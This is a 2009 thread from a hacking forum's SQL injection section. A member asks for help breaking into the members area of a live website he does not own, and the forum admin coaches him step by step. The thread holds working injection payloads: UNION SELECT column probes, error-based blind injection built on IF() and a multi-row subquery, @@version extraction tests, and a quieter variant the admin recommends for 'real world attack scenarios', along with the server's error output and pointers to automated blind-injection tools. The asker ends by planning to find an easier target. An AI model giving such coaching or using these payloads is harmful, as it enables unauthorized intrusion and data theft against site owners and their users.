Login or Register ::  Home  ::  Search  ::  Your Account  ::  Forums  ::   Waraxe Advisories  ::  Tools  :: April 27, 2024 Menu  Home  Logout  Discussions  Forums  Members List  IRC chat  Tools  Base64 coder  MD5 hash  CRC32 checksum  ROT13 coder  SHA-1 hash  URL-decoder  Sql Char Encoder  Affiliates  y3dips ITsec  Md5 Cracker  User Manuals  AlbumNow  Content  Content  Sections  FAQ  Top  Info  Feedback  Recommend Us  Search  Journal  Your Account User Info Welcome, Anonymous Nickname Password (Register) Membership: Latest: MichaelSnaRe New Today: 0 New Yesterday: 0 Overall: 9145 People Online: Visitors: 410 Members: 0 Total: 410 PacketStorm News ·301 Moved Permanently read more... IT Security and Insecurity Portal www.waraxe.us Forum Index -> Sql injection -> sql injection help please    View previous topic :: View next topic  sql injection help please Posted: Thu Jun 04, 2009 3:25 pm RubberDoll Active user   Joined: Jun 04, 2009 Posts: 46 Hello waraxe, and thank you and others as knowledgable, for offering your help in so many cases. I've been reading topics here as a guest for a long time sorry for picking stupid topic name, I'm a noob and I didn't know how to be more specific. I'm pretty new to injections and I'm stuck with this error which I don't know how to move on. I'm assuming the site is volunerable because it does reply with sql error, but no idea how to go from here.. id=20477+order+by+1-- no error, and the page displayed fine id=20477+order+by+2-- Quote: MySQL error occured on line 380. Error 1054: Unknown column '2' in 'order clause' I did discover tho, that when I tried ?id=20477+order+by+13-- the sql error changed Quote: MySQL error occured on line 94 in file c:\ZendProject/ZendProject_c/view-94.php.src. Error 1054: Unknown column '13' in 'order clause' Query: SELECT aw_d1_gal_cat.parent_line, aw_d1_gal_cat.date, aw_d1_gal_cat.name, aw_d1_gal_cat.descr, aw_d1_gal_cat.descr2, aw_d1_gal_cat.descr3, aw_d1_gal_cat.descr4, aw_d1_gal_cat.descr5, aw_d1_gal_cat.id, aw_d1_gal_cat.extid, aw_d1_gal_cat.parent, aw_d1_gal_cat.trial FROM aw_gal_content, aw_d1_gal_cat WHERE aw_gal_content.id=20477 order by 13-- and aw_d1_gal_cat.extid=aw_gal_content.cid I also tried id=null%20union%20all%20select%201,2,3,4,5,6,7,8,9,10,11,12-- Quote: Error 1222: The used SELECT statements have a different number of columns while ?id=null%20union%20all%20select%01,2,3,4,5,6,7,8,9,10,11,12,13-- results in the long syntax error as above I assume 12 columns would be the correct guess, despite the error msg, but I don't know how to find the vulnerable column in this case, or is it even possible to go further with this Thank you Posted: Thu Jun 04, 2009 7:55 pm waraxe Site admin   Joined: May 11, 2004 Posts: 2407 Location: Estonia, Tartu Affected parameter (id) is used in multiple different sql queries and they need different column count. Try this: Code: id=-1+UNION+ALL+SELECT+12345--+ ... and search for "12345" in response page html source. If you can't get visual feedback, then next option is error-based feedback. Try this: Code: ?id=-1+OR+IF(0,(SELECT+1+UNION+ALL+SELECT+1),0)--+ Code: ?id=-1+OR+IF(1,(SELECT+1+UNION+ALL+SELECT+1),0)--+ Posted: Fri Jun 05, 2009 3:53 am RubberDoll Active user   Joined: Jun 04, 2009 Posts: 46 Thank you, waraxe id=-1+OR+IF(0,(SELECT+1+UNION+ALL+SELECT+1),0)--+ blank page with: Quote: item not found. ?id=-1+OR+IF(1,(SELECT+1+UNION+ALL+SELECT+1),0)--+ Quote: MySQL error occured on line 94 in file c:\ZendProject/ZendProject_c/view-94.php.src. Error 1242: Subquery returns more than 1 row Query: SELECT aw_d1_gal_cat.parent_line, aw_d1_gal_cat.date, aw_d1_gal_cat.name, aw_d1_gal_cat.descr, aw_d1_gal_cat.descr2, aw_d1_gal_cat.descr3, aw_d1_gal_cat.descr4, aw_d1_gal_cat.descr5, aw_d1_gal_cat.id, aw_d1_gal_cat.extid, aw_d1_gal_cat.parent, aw_d1_gal_cat.trial FROM aw_gal_content, aw_d1_gal_cat WHERE aw_gal_content.id=-1 OR IF(1,(SELECT 1 UNION ALL SELECT 1),0)-- and aw_d1_gal_cat.extid=aw_gal_content.cid btw, the site is an internet site and not on my machine, despite the local path shown in the error and is inside members area.. Posted: Fri Jun 05, 2009 8:41 am waraxe Site admin   Joined: May 11, 2004 Posts: 2407 Location: Estonia, Tartu This means that you can use blind sql injection methods. Still, are you sure, that you don't have usable visual feedback? Try: Code: id=12000%2b345 Now Look at response page - do you see somewhere text as "12345"? Another test: Code: id=-1+UNION+ALL+SELECT+0x4142434445--+ And look for text "ABCDE". By the way, for best results look at html source and search for those text markers from there too! Now, if you tried this and did not get easy-to-use visual feedback, then you have to use blind injection methods. It means asking target server boolean questions and getting data back bit-by-bit. Blind injection manual exploitation is time consuming and error prone, so I would recommend automated tools or scripts for this. Posted: Sat Jun 06, 2009 9:50 am RubberDoll Active user   Joined: Jun 04, 2009 Posts: 46 yep I'm completely sure I have no better visual feedback in the source also there's no malformed page with these errors, only the error string displays by itself id=12000%2b345 Code: item not found. that's the source.. id=-1+UNION+ALL+SELECT+0x4142434445--+ source of reply: Code: <b>MySQL</b> error occured on line <u>94</u> in file <u>c:\ZendProject/ZendProject_c/view-94.php.src</u>.<br><b>Error 1222:</b> <u>The used SELECT statements have a different number of columns</u><br><b>Query:</b> <u>SELECT aw_d1_gal_cat.parent_line, aw_d1_gal_cat.date, aw_d1_gal_cat.name, aw_d1_gal_cat.descr, aw_d1_gal_cat.descr2, aw_d1_gal_cat.descr3, aw_d1_gal_cat.descr4, aw_d1_gal_cat.descr5, aw_d1_gal_cat.id, aw_d1_gal_cat.extid, aw_d1_gal_cat.parent, aw_d1_gal_cat.trial FROM aw_gal_content, aw_d1_gal_cat WHERE aw_gal_content.id=-1 UNION ALL SELECT 0x4142434445--  and aw_d1_gal_cat.extid=aw_gal_content.cid</u> Could I ask if there's any automated tool to perform the bit by bit injection? and what exactly would I need to do to make it manually? I might give it a try little by little if nothing else is possible I also wanted to ask, with your permision, what was I 'telling' to the server in these strings from your earlier reply: ?id=-1+OR+IF(0,(SELECT+1+UNION+ALL+SELECT+1),0)--+ ?id=-1+OR+IF(1,(SELECT+1+UNION+ALL+SELECT+1),0)--+ lastly, I can PM you the login info and site url if you think that looking directly might help.. Thanks again Posted: Sat Jun 06, 2009 12:44 pm waraxe Site admin   Joined: May 11, 2004 Posts: 2407 Location: Estonia, Tartu Search Google for Blind Sql Injection tools: http://www.google.ee/search?hl=et&q=blind+sql+injection+tool&btnG=Google+otsing&lr=&aq=f&oq= Do you know c/c++/php/perl/python/ruby or other programming languages? If you do, then it's not hard to write your own exploit script/program. Code: ?id=-1+OR+IF(0,(SELECT+1+UNION+ALL+SELECT+1),0)--+ ?id=-1+OR+IF(1,(SELECT+1+UNION+ALL+SELECT+1),0)--+ Sql injection exploitation method above is based on indusing of sql errors. Depending on boolean true or false, IF() construction will return two rows of ones or just zero. And in case of two rows you can see nice sql error message about subquery returning more than one row. In this way depending on server response attacker can differ between boolean true and false. Example, which involves @@version: Code: ?id=-1+OR+IF(LENGTH(@@version)<1,(SELECT+1+UNION+ALL+SELECT+1),0)--+ ?id=-1+OR+IF(LENGTH(@@version)>0,(SELECT+1+UNION+ALL+SELECT+1),0)--+ Same example with different error inducing method: Code: ?id=0%2bIF(LENGTH(@@version)<1,20477,0) ?id=0%2bIF(LENGTH(@@version)>0,20477,0) Method above does not generate sql errors, which is generally good in the case of real world attack scenarios. Posted: Sun Jun 07, 2009 6:03 am RubberDoll Active user   Joined: Jun 04, 2009 Posts: 46 Thank you waraxe, I did find a windows tool (Absinthe) that also supports login (since the vulnerable script is in members area) but it does not support mysql Unfortunately, I have no knowledge of programing. nothing at all. Perhaps I'm aiming too high trying this site, and I should move on and find a more "common" target. Thanks for your time :) sql injection help please   www.waraxe.us Forum Index -> Sql injection You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum All times are GMT   Page 1 of 1   All Posts1 Day7 Days2 Weeks1 Month3 Months6 Months1 Year Oldest FirstNewest First  Select a forum Security Research by waraxe----------------General discussionHow to fixMetasploit related Hash cracking requests----------------MD5 hashesAll other hashesHash related information http://www.waraxe.us portal----------------SuggestionsCooperation proposals Security bugs and issues in general----------------Newbies cornerSql injectionCross-site scripting aka XSSRemote file inclusionFull path disclosureShell commands injectionPhishing and Social EngineeringAll other security holes Various software----------------PhpNukePostNukePhpBBXMB forumvBulletin BoardInvision Power Boarde107MamboJoomlaXOOPSM$ WindowsLinux worldAll other softwareCoppermine Photo Gallery Programming languages----------------PhpMySqlPerlJavaJavascriptC and C++Visual BasicBorland Delphi and PascalPythonHTML and XMLAssembler Reverse engineering----------------Newbies cornerDisassemblingPHP script decode requests Miscellaneous stuff----------------Future of the ITNanotechnologyFun cornerLinksTry2hack sitesProxy database Direct Downloads----------------ToolsTutorialsWordlists Recycle Bin----------------Removed messagesOutdated posts   Powered by phpBB © 2001-2008 phpBB Group

Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2020 Janek Vind "waraxe"
Page Generation: 0.182 Seconds